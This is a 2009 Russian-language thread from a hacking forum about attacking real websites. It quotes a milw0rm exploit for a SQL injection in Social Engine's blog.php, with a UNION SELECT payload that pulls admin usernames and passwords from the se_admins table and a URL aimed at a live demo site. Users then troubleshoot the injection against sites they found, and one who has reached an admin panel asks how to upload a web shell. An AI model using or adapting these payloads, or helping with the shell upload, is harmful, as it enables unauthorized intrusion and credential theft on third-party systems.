Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

25.01.2009, 12:12
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме: 1484154
Репутация:
126
|
|
сайт с такой уязвимостью я нашел sql видно хеш и пароль получить не могу
|
|
|

25.01.2009, 16:09
|
|
Познающий
Регистрация: 26.01.2007
Сообщений: 40
Провел на форуме: 191945
Репутация:
7
|
|
может пробел стоит в слове password?
в начале сам чет не заметил
|
|
|

25.01.2009, 16:39
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме: 1484154
Репутация:
126
|
|
нет пробела в адресе не было эту фишку античата я знаю
|
|
|

01.02.2009, 14:41
|
|
Познающий
Регистрация: 26.01.2007
Сообщений: 40
Провел на форуме: 191945
Репутация:
7
|
|
блоги
Код:
==================================================================================================================
= SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM =
= S N N N A A K K E S T E A A M M M M =
+ SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M +
= S N N N A A K K E S T E A A M M M =
= SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M =
===================================================SNAKES TEAM====================================================
+ =
= Social Engine (blog.php) SQL Injection Vulnerability +
+ =
==============================================:::ALGERIAN HaCkEr:::===============================================
= = = =
= = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = =
= =
:::::Mail: snakespc@gmail.com:::::::
= =
= http://www.socialengine.net/demos.php "blog.php" =
===================================GAZA=============================================
Exploit:
http://localhost/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
********
demo:
http://www.socialenginedev.com/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
============================================================== ALLAH AKBAR=========================================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: SuB-ZeRo
ALL www.SnakespC.com/sc >>>>dz-security.net >>>> Members
Str0ke ....Milw0rm
=====================================================GAZA=========================================================================
# milw0rm.com [2009-01-28]
|
|
|

01.02.2009, 15:25
|
|
Познающий
Регистрация: 26.01.2007
Сообщений: 40
Провел на форуме: 191945
Репутация:
7
|
|
Сообщение от heks
сайт с такой уязвимостью я нашел sql видно хеш и пароль получить не могу
сейчас такая же проблема
Код:
The used SELECT statements have a different number of columns SQL was: SELECT NULL FROM se_blogentries WHERE blogentry_user_id='965' AND (blogentry_privacy & '8') && blogentry_blogentrycat_id=-21 UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18 from se_admins/*
|
|
|

01.02.2009, 17:56
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Берем дружно книжечку по англ. языку и переводим:
The used SELECT statements have a different number of columns
Это значит
Используемая SELECT имеет иное кол-во столбцов
|
|
|

01.02.2009, 18:35
|
|
Познающий
Регистрация: 26.01.2007
Сообщений: 40
Провел на форуме: 191945
Репутация:
7
|
|
mailbrush
да я понял,
подобрать так и не получилось
|
|
|

22.02.2009, 02:49
|
|
Новичок
Регистрация: 02.04.2007
Сообщений: 12
Провел на форуме: 105055
Репутация:
7
|
|
Ребят я в админке, кто нибудь решил проблему с заливкой шелла?
И еще вопрос, кто знает какие способы заливки шелов, через картинки, через урлы или еще как. Или ткните меня пожалуйста носом где говорится об этом.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|